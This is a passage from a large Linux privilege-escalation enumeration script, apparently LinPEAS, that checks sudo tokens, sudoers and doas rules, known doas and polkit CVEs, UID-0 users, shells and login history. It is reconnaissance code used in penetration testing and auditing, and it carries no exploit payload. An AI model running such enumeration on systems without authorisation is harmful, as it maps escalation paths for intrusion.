-l 2>/dev/null) 9400 if [ "$sudo_l_cached_output" ]; then 9401 sudo_l_colorize_output "$sudo_l_cached_output" 9402 else 9403 echo "No cached sudo token (sudo -n -l)" 9404 fi 9405 else 9406 echo_not_found "sudo" 9407 fi 9408 secure_path_line=$(printf "%s\n%s\n%s\n" "$sudo_l_cached_output" "$sudo_l_password_output" "$sudo_l_output" | grep -o "secure_path=[^,]*" | head -n 1 | cut -d= -f2) 9409 if [ "$secure_path_line" ]; then 9410 for p in $(echo "$secure_path_line" | tr ':' ' '); do 9411 if [ -w "$p" ]; then 9412 echo "Writable secure_path entry: $p" | sed -${E} "s,.*,${SED_RED},g" 9413 fi 9414 done 9415 fi 9416 (sudo_l_colorize_file /etc/sudoers) 2>/dev/null || echo_not_found "/etc/sudoers" 9417 if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then 9418 echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," 9419 fi 9420 for f in /etc/sudoers.d/*; do 9421 if [ -w "$f" ]; then 9422 echo "Sudoers file: $f is writable and may allow privilege escalation" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9423 fi 9424 if [ -r "$f" ]; then 9425 echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g" 9426 sudo_l_colorize_file "$f" 9427 fi 9428 done 9429 echo "" 9430 9431 fi 9432 9433 get_current_user_privot_pid 9434 if check_mitre_filter "T1548.003"; then 9435 print_2title "Checking sudo tokens" "T1548.003" 9436 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens" 9437 ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" 9438 if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then 9439 echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g"; 9440 if [ "$(command -v gdb 2>/dev/null || echo -n '')" ]; then 9441 echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; 9442 fi 9443 if [ "$CURRENT_USER_PIVOT_PID" ]; then 9444 echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g"; 9445 fi 9446 if [ -f "$HOME/.sudo_as_admin_successful" ]; then 9447 echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},"; 9448 fi 9449 if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then 9450 echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g"; 9451 ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' 9452 fi 9453 else 9454 echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; 9455 fi 9456 if [ -d "/var/run/sudo/ts" ]; then 9457 echo "Sudo token directory perms:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9458 ls -ld /var/run/sudo/ts 2>/dev/null 9459 if [ -w "/var/run/sudo/ts" ]; then 9460 echo "/var/run/sudo/ts is writable" | sed -${E} "s,.*,${SED_RED},g" 9461 fi 9462 if [ -f "/var/run/sudo/ts/$USER" ]; then 9463 ls -l "/var/run/sudo/ts/$USER" 2>/dev/null 9464 if [ -w "/var/run/sudo/ts/$USER" ]; then 9465 echo "User sudo token file is writable" | sed -${E} "s,.*,${SED_RED},g" 9466 fi 9467 fi 9468 fi 9469 echo "" 9470 9471 fi 9472 9473 if check_mitre_filter "T1548.003"; then 9474 doas_bin="$(command -v doas 2>/dev/null)" 9475 doas_current_user="$(id -un 2>/dev/null)" 9476 doas_current_uid="$(id -u 2>/dev/null)" 9477 doas_current_groups="$(id -Gn 2>/dev/null)" 9478 doas_current_gids="$(id -G 2>/dev/null)" 9479 doas_bin_trusted="no" 9480 doas_conf_candidates="/etc/doas.conf 9481 /usr/local/etc/doas.conf 9482 /opt/local/etc/doas.conf 9483 /usr/pkg/etc/doas.conf" 9484 if [ -n "$doas_bin" ]; then 9485 doas_conf_candidates="$doas_conf_candidates 9486 $(dirname "$doas_bin")/doas.conf 9487 $(dirname "$doas_bin")/../etc/doas.conf 9488 $(dirname "$doas_bin")/etc/doas.conf" 9489 if command -v strings >/dev/null 2>&1; then 9490 doas_strings_conf="$(strings "$doas_bin" 2>/dev/null | grep -E '^/[^[:space:]]*/doas\.conf$' | head -n 10)" 9491 [ -n "$doas_strings_conf" ] && doas_conf_candidates="$doas_conf_candidates 9492 $doas_strings_conf" 9493 fi 9494 fi 9495 doas_conf_found="no" 9496 for conf_file in /etc/doas.conf /usr/local/etc/doas.conf /opt/local/etc/doas.conf /usr/pkg/etc/doas.conf; do 9497 [ -e "$conf_file" ] && doas_conf_found="yes" 9498 done 9499 if [ -n "$doas_bin" ] || [ "$doas_conf_found" = "yes" ]; then 9500 print_2title "Doas/OpenDoas configuration and vulnerabilities" "T1548.003" 9501 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#doas" 9502 if [ -n "$doas_bin" ]; then 9503 print_3title "Doas binary and version" "T1548.003" 9504 # -L makes permission checks describe the executable target, not a package-manager symlink. 9505 doas_bin_owner="$(ls -ldLn "$doas_bin" 2>/dev/null | awk '{print $3}')" 9506 doas_bin_mode="$(ls -ldL "$doas_bin" 2>/dev/null | awk '{print $1}')" 9507 echo "Doas binary found at: $doas_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9508 ls -ld "$doas_bin" 2>/dev/null 9509 doas_bin_trusted="yes" 9510 if [ "$doas_bin_owner" != "0" ]; then 9511 echo "WARNING: doas is not owned by root (owner UID: ${doas_bin_owner:-unknown})" | sed -${E} "s,.*,${SED_RED},g" 9512 doas_bin_trusted="no" 9513 fi 9514 if [ -u "$doas_bin" ]; then 9515 echo "Doas has the expected SUID bit set (normal for a privilege-delegation binary)" | sed -${E} "s,.*,${SED_GREEN},g" 9516 else 9517 echo "Doas does not have its usual SUID bit; verify how privileges are granted" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9518 doas_bin_trusted="no" 9519 fi 9520 if { [ "$doas_current_uid" != "0" ] && [ -w "$doas_bin" ]; } || printf "%s" "$doas_bin_mode" | cut -c6,9 | grep -q w; then 9521 echo "CRITICAL: doas is writable by a non-root context or by group/other" | sed -${E} "s,.*,${SED_RED},g" 9522 doas_bin_trusted="no" 9523 fi 9524 doas_get_package_details "$doas_bin" 9525 doas_upstream_version="$(doas_extract_upstream_version "$doas_package_full_version")" 9526 if [ -n "$doas_package_full_version" ]; then 9527 doas_package_label="$doas_package_name $doas_package_full_version (${doas_package_manager:-unknown manager}, implementation: $doas_package_implementation)" 9528 echo "Package: $doas_package_label" 9529 [ -n "$doas_package_homepage" ] && echo "Homepage: $doas_package_homepage" 9530 if { [ "$doas_package_implementation" = "opendoas" ] || [ "$doas_package_implementation" = "unknown" ]; } && \ 9531 [ -n "$doas_upstream_version" ] && doas_version_ge "$doas_upstream_version" "6.6" && doas_version_lt "$doas_upstream_version" "6.8.1"; then 9532 echo "Potentially vulnerable to CVE-2019-25016: OpenDoas 6.6 through 6.8 may inherit an attacker-controlled PATH for unrestricted rules (verify distro backports)" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9533 fi 9534 if [ "$doas_package_implementation" = "slicer69" ] && [ -n "$doas_upstream_version" ] && doas_version_lt "$doas_upstream_version" "6.2"; then 9535 echo "Potentially vulnerable to CVE-2019-15900 and CVE-2019-15901: slicer69/doas before 6.2 can mishandle identities/groups on non-OpenBSD platforms" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9536 elif [ "$doas_package_implementation" = "unknown" ] && [ -n "$doas_upstream_version" ] && doas_version_lt "$doas_upstream_version" "6.2"; then 9537 echo "Old doas version detected; if this is the slicer69 portable implementation, review CVE-2019-15900 and CVE-2019-15901" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9538 fi 9539 if [ "$(uname -s 2>/dev/null)" = "Linux" ] && \ 9540 { [ "$doas_package_implementation" = "opendoas" ] || [ "$doas_package_implementation" = "unknown" ]; } && \ 9541 [ -n "$doas_upstream_version" ] && doas_version_le "$doas_upstream_version" "6.8.2"; then 9542 if [ -r /proc/sys/dev/tty/legacy_tiocsti ]; then 9543 doas_tiocsti="$(cat /proc/sys/dev/tty/legacy_tiocsti 2>/dev/null)" 9544 if [ "$doas_tiocsti" = "1" ]; then 9545 echo "Potentially vulnerable to CVE-2023-28339: OpenDoas <=6.8.2 shares the terminal and legacy TIOCSTI is enabled" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9546 else 9547 echo "CVE-2023-28339 TIOCSTI path appears mitigated (dev.tty.legacy_tiocsti=$doas_tiocsti)" | sed -${E} "s,.*,${SED_GREEN},g" 9548 fi 9549 else 9550 echo "OpenDoas <=6.8.2 detected; review CVE-2023-28339 because the kernel TIOCSTI mitigation state could not be read" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9551 fi 9552 fi 9553 else 9554 echo "Could not determine the installed doas package/version; check vendor advisories manually" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9555 fi 9556 else 9557 echo_not_found "doas" 9558 fi 9559 echo "" 9560 print_3title "Doas configuration rules" "T1548.003" 9561 doas_conf_found="no" 9562 doas_seen_configs="|" 9563 while IFS= read -r conf_file; do 9564 [ -n "$conf_file" ] || continue 9565 case "$doas_seen_configs" in *"|$conf_file|"*) continue ;; esac 9566 doas_seen_configs="$doas_seen_configs$conf_file|" 9567 [ -e "$conf_file" ] || continue 9568 doas_conf_found="yes" 9569 # Follow the final symlink for ownership/mode checks, but still report the indirection below. 9570 doas_conf_owner="$(ls -ldLn "$conf_file" 2>/dev/null | awk '{print $3}')" 9571 doas_conf_mode="$(ls -ldL "$conf_file" 2>/dev/null | awk '{print $1}')" 9572 doas_conf_dir="$(dirname "$conf_file")" 9573 doas_conf_dir_mode="$(ls -ld "$doas_conf_dir" 2>/dev/null | awk '{print $1}')" 9574 echo "Found: $conf_file ($doas_conf_mode owner UID ${doas_conf_owner:-unknown})" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9575 doas_conf_trusted="yes" 9576 if [ -L "$conf_file" ]; then 9577 echo "WARNING: $conf_file is a symbolic link; verify its target and ownership" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9578 fi 9579 if [ "$doas_conf_owner" != "0" ]; then 9580 echo "CRITICAL: $conf_file is not owned by root" | sed -${E} "s,.*,${SED_RED},g" 9581 doas_conf_trusted="no" 9582 fi 9583 if { [ "$doas_current_uid" != "0" ] && [ -w "$conf_file" ]; } || printf "%s" "$doas_conf_mode" | cut -c6,9 | grep -q w; then 9584 echo "CRITICAL: $conf_file is writable by the current user, group, or other users" | sed -${E} "s,.*,${SED_RED},g" 9585 doas_conf_trusted="no" 9586 fi 9587 if { [ "$doas_current_uid" != "0" ] && [ -w "$doas_conf_dir" ]; } || printf "%s" "$doas_conf_dir_mode" | cut -c6,9 | grep -q w; then 9588 echo "CRITICAL: configuration directory $doas_conf_dir is writable; doas.conf may be replaceable" | sed -${E} "s,.*,${SED_RED},g" 9589 doas_conf_trusted="no" 9590 fi 9591 if [ -r "$conf_file" ]; then 9592 doas_active_rules="$(doas_read_rules "$conf_file")" 9593 if [ -z "$doas_active_rules" ]; then 9594 echo "No active permit/deny rules found in $conf_file" 9595 else 9596 while IFS=" " read -r doas_rule_number doas_rule_line; do 9597 [ -n "$doas_rule_line" ] || continue 9598 doas_rule_applies="no" 9599 doas_rule_root="no" 9600 doas_rule_nopass="no" 9601 doas_rule_unrestricted="no" 9602 doas_rule_dangerous="no" 9603 doas_rule_env="no" 9604 doas_rule_cmd_value="$(doas_rule_command "$doas_rule_line")" 9605 doas_rule_applies_to_current_user "$doas_rule_line" && doas_rule_applies="yes" 9606 doas_rule_targets_root "$doas_rule_line" && doas_rule_root="yes" 9607 doas_rule_has_option "$doas_rule_line" nopass && doas_rule_nopass="yes" 9608 [ -z "$doas_rule_cmd_value" ] && doas_rule_unrestricted="yes" 9609 [ -n "$doas_rule_cmd_value" ] && doas_command_is_dangerous "$doas_rule_cmd_value" && doas_rule_dangerous="yes" 9610 doas_rule_has_dangerous_environment "$doas_rule_line" && doas_rule_env="yes" 9611 if printf "%s" "$doas_rule_line" | grep -q '^deny'; then 9612 echo " $conf_file:$doas_rule_number $doas_rule_line" 9613 continue 9614 fi 9615 if [ "$doas_rule_applies" = "yes" ] && [ "$doas_rule_root" = "yes" ]; then 9616 echo " $conf_file:$doas_rule_number $doas_rule_line" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9617 if [ "$doas_rule_unrestricted" = "yes" ] && [ "$doas_rule_nopass" = "yes" ]; then 9618 echo "POTENTIAL: a matching permit rule allows arbitrary root commands without a password; a later rule may override it" | sed -${E} "s,.*,${SED_RED},g" 9619 elif [ "$doas_rule_unrestricted" = "yes" ]; then 9620 echo "POTENTIAL: a matching permit rule allows arbitrary root commands after authentication; a later rule may override it" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9621 elif [ "$doas_rule_dangerous" = "yes" ] && [ "$doas_rule_nopass" = "yes" ]; then 9622 echo "POTENTIAL: a matching permit rule allows GTFOBins-capable command $doas_rule_cmd_value as root without a password; a later rule may override it" | sed -${E} "s,.*,${SED_RED},g" 9623 if [ "${doas_rule_cmd_value##*/}" = "dstat" ]; then 9624 echo "This is the HTB Soccer privilege-escalation pattern: a user-controlled dstat plugin can execute as root" | sed -${E} "s,.*,${SED_RED},g" 9625 fi 9626 elif [ "$doas_rule_dangerous" = "yes" ]; then 9627 echo "POTENTIAL: a matching permit rule allows GTFOBins-capable command $doas_rule_cmd_value as root after authentication; a later rule may override it" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9628 elif [ "$doas_rule_nopass" = "yes" ]; then 9629 echo "POTENTIAL: a matching permit rule allows $doas_rule_cmd_value as root without a password; inspect command-specific escapes and later rules" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9630 fi 9631 if [ "$doas_rule_env" = "yes" ]; then 9632 echo "Dangerous environment preservation is enabled for an applicable root rule (keepenv or sensitive setenv variable)" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9633 fi 9634 elif [ "$doas_rule_root" = "yes" ] && { [ "$doas_rule_nopass" = "yes" ] || [ "$doas_rule_unrestricted" = "yes" ] || [ "$doas_rule_dangerous" = "yes" ]; }; then 9635 echo " $conf_file:$doas_rule_number $doas_rule_line" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9636 else 9637 echo " $conf_file:$doas_rule_number $doas_rule_line" 9638 fi 9639 done <<EOF 9640 $doas_active_rules 9641 EOF 9642 fi 9643 else 9644 echo "Cannot read $conf_file directly; attempting safe effective-rule checks with doas -C" 9645 doas_active_rules="" 9646 fi 9647 if [ -n "$doas_bin" ] && [ "$doas_bin_trusted" = "yes" ] && [ "$doas_conf_trusted" = "yes" ]; then 9648 if doas_config_syntax_valid "$doas_bin" "$conf_file"; then 9649 doas_test_commands="/bin/sh 9650 /bin/bash 9651 /usr/bin/env 9652 /usr/bin/dstat" 9653 while IFS=" " read -r doas_rule_number doas_rule_line; do 9654 doas_rule_cmd_value="$(doas_rule_command "$doas_rule_line")" 9655 [ -n "$doas_rule_cmd_value" ] && doas_test_commands="$doas_test_commands 9656 $doas_rule_cmd_value" 9657 done <<EOF 9658 $doas_active_rules 9659 EOF 9660 doas_seen_test_commands="|" 9661 while IFS= read -r doas_test_cmd; do 9662 [ -n "$doas_test_cmd" ] || continue 9663 case "$doas_seen_test_commands" in *"|$doas_test_cmd|"*) continue ;; esac 9664 doas_seen_test_commands="$doas_seen_test_commands$doas_test_cmd|" 9665 doas_check_output="$(doas_check_command "$doas_bin" "$conf_file" "$doas_test_cmd")" 9666 case "$doas_check_output" in 9667 "permit nopass"*) 9668 echo "EFFECTIVE RULE: current user may run $doas_test_cmd as root without a password ($doas_check_output)" | sed -${E} "s,.*,${SED_RED},g" 9669 ;; 9670 permit*) 9671 echo "Effective rule: current user may run $doas_test_cmd as root after authentication ($doas_check_output)" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9672 ;; 9673 esac 9674 done <<EOF 9675 $doas_test_commands 9676 EOF 9677 else 9678 echo "doas rejected or could not validate $conf_file with -C; inspect its syntax and security properties" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9679 fi 9680 fi 9681 done <<EOF 9682 $doas_conf_candidates 9683 EOF 9684 if [ "$doas_conf_found" = "no" ]; then 9685 echo_not_found "doas.conf" 9686 fi 9687 else 9688 echo_not_found "doas" 9689 fi 9690 echo "" 9691 9692 fi 9693 9694 if check_mitre_filter "T1548.003,T1548.004,T1068"; then 9695 print_2title "Checking Pkexec and Polkit" "T1548.003,T1548.004,T1068" 9696 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2" 9697 echo "" 9698 print_3title "Polkit Binary" "T1548.003,T1068" 9699 # Check pkexec binary 9700 pkexec_bin=$(command -v pkexec 2>/dev/null) 9701 if [ -n "$pkexec_bin" ]; then 9702 echo "Pkexec binary found at: $pkexec_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9703 if [ -u "$pkexec_bin" ]; then 9704 echo "Pkexec binary has SUID bit set!" | sed -${E} "s,.*,${SED_RED},g" 9705 fi 9706 ls -l "$pkexec_bin" 2>/dev/null 9707 # Check polkit version for known vulnerabilities 9708 if command -v pkexec >/dev/null 2>&1; then 9709 pkexec --version 2>/dev/null 9710 pkexec_version="$(pkexec --version 2>/dev/null | grep -oE '[0-9]+(\.[0-9]+)+')" 9711 if [ "$pkexec_version" ] && [ "$(printf '%s\n' "$pkexec_version" "0.120" | sort -V | head -n1)" = "$pkexec_version" ] && [ "$pkexec_version" != "0.120" ]; then 9712 echo "Potentially vulnerable to CVE-2021-4034 (PwnKit) - check distro patches" | sed -${E} "s,.*,${SED_RED_YELLOW}," 9713 fi 9714 fi 9715 fi 9716 # Check polkit policies 9717 echo "" 9718 print_3title "Polkit Policies" "T1548.003" 9719 for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do 9720 if [ -d "$policy_dir" ]; then 9721 echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9722 if [ -w "$policy_dir" ]; then 9723 echo "WARNING: $policy_dir is writable!" | sed -${E} "s,.*,${SED_RED},g" 9724 fi 9725 for policy_file in "$policy_dir"/*; do 9726 if [ -f "$policy_file" ]; then 9727 if [ -w "$policy_file" ]; then 9728 echo "WARNING: $policy_file is writable!" | sed -${E} "s,.*,${SED_RED},g" 9729 fi 9730 cat "$policy_file" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$Groups,${SED_RED},g" 9731 fi 9732 done 9733 fi 9734 done 9735 # Check for polkit authentication agent 9736 echo "" 9737 print_3title "Polkit Authentication Agent" "T1548.004" 9738 ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep" 9739 echo "" 9740 9741 fi 9742 9743 if check_mitre_filter "T1087.001"; then 9744 print_2title "Superusers and UID 0 Users" "T1087.001" 9745 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html" 9746 # Check /etc/passwd for UID 0 users 9747 echo "" 9748 print_3title "Users with UID 0 in /etc/passwd" "T1087.001" 9749 awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g" 9750 if [ command -v getent >/dev/null 2>&1 ]; then 9751 for group in sudo wheel adm docker lxd lxc root shadow disk video; do 9752 if getent group "$group" >/dev/null 2>&1; then 9753 echo "- Users in group '$group':" 9754 getent group "$group" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_RED},g" 9755 fi 9756 done 9757 fi 9758 # Check for users with sudo privileges in sudoers 9759 echo "" 9760 print_3title "Users with sudo privileges in sudoers" "T1087.001" 9761 grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g" 9762 echo "" 9763 9764 fi 9765 9766 if check_mitre_filter "T1087.001"; then 9767 print_2title "Users with console" "T1087.001" 9768 if [ "$MACPEAS" ]; then 9769 dscl . list /Users | while read un; do 9770 ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2) 9771 if grep -q "$ushell" /etc/shells; then #Shell user 9772 dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 9773 echo "" 9774 fi 9775 done 9776 else 9777 no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) 9778 unexpected_shells="" 9779 printf "%s\n" "$no_shells" | while read f; do 9780 if [ -x "$f" ]; then 9781 if [ "$TIMEOUT" ]; then 9782 if $TIMEOUT 1 "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then 9783 unexpected_shells="$f\n$unexpected_shells" 9784 fi 9785 else 9786 if "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then 9787 unexpected_shells="$f\n$unexpected_shells" 9788 fi 9789 fi 9790 fi 9791 done 9792 grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 9793 if [ "$unexpected_shells" ]; then 9794 printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" 9795 echo "Unexpected users with shells:" 9796 printf "%s\n" "$unexpected_shells" | while read f; do 9797 if [ "$f" ]; then 9798 grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" 9799 fi 9800 done 9801 fi 9802 fi 9803 echo "" 9804 9805 fi 9806 9807 if check_mitre_filter "T1087.001,T1069.001"; then 9808 print_2title "All users & groups" "T1087.001,T1069.001" 9809 if [ "$MACPEAS" ]; then 9810 dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" 9811 else 9812 cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" 9813 fi 9814 echo "" 9815 9816 fi 9817 9818 if check_mitre_filter "T1033"; then 9819 print_2title "Currently Logged in Users" "T1033" 9820 # Check basic user information 9821 echo "" 9822 print_3title "Basic user information" "T1033" 9823 (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9824 # Check for active sessions 9825 echo "" 9826 print_3title "Active sessions" "T1033" 9827 if command -v w >/dev/null 2>&1; then 9828 w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9829 fi 9830 # Check for logged in users via utmp 9831 echo "" 9832 print_3title "Logged in users (utmp)" "T1033" 9833 if [ -f "/var/run/utmp" ]; then 9834 who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9835 fi 9836 # Check for SSH sessions 9837 echo "" 9838 print_3title "SSH sessions" "T1033" 9839 if command -v ss >/dev/null 2>&1; then 9840 ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9841 fi 9842 # Check for screen sessions 9843 echo "" 9844 print_3title "Screen sessions" "T1033" 9845 if command -v screen >/dev/null 2>&1; then 9846 screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9847 fi 9848 # Check for tmux sessions 9849 echo "" 9850 print_3title "Tmux sessions" "T1033" 9851 if command -v tmux >/dev/null 2>&1; then 9852 tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9853 fi 9854 echo "" 9855 9856 fi 9857 9858 if check_mitre_filter "T1033"; then 9859 print_2title "Last Logons and Login History" "T1033" 9860 # Check last logins 9861 echo "" 9862 print_3title "Last logins" "T1033" 9863 if command -v last >/dev/null 2>&1; then 9864 last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9865 fi 9866 # Check failed login attempts 9867 echo "" 9868 print_3title "Failed login attempts" "T1033" 9869 if command -v lastb >/dev/null 2>&1; then 9870 lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9871 fi 9872 # Check auth logs for recent logins 9873 echo "" 9874 print_3title "Recent logins from auth.log (limit 20)" "T1033" 9875 if [ -f "/var/log/auth.log" ]; then 9876 grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" 9877 fi 9878 # Last time logon each user 9879 echo "" 9880 if command -v lastlog >/dev/null 2>&1; then 9881 print_3title "Last time logon each user" "T1033" 9882 lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 9883 fi 9884 EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')" 9885 if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then 9886 dscl . list /Users | while read un; do 9887 ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2) 9888 if grep -q "$ushell" /etc/shells; then #Shell user 9889 finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," 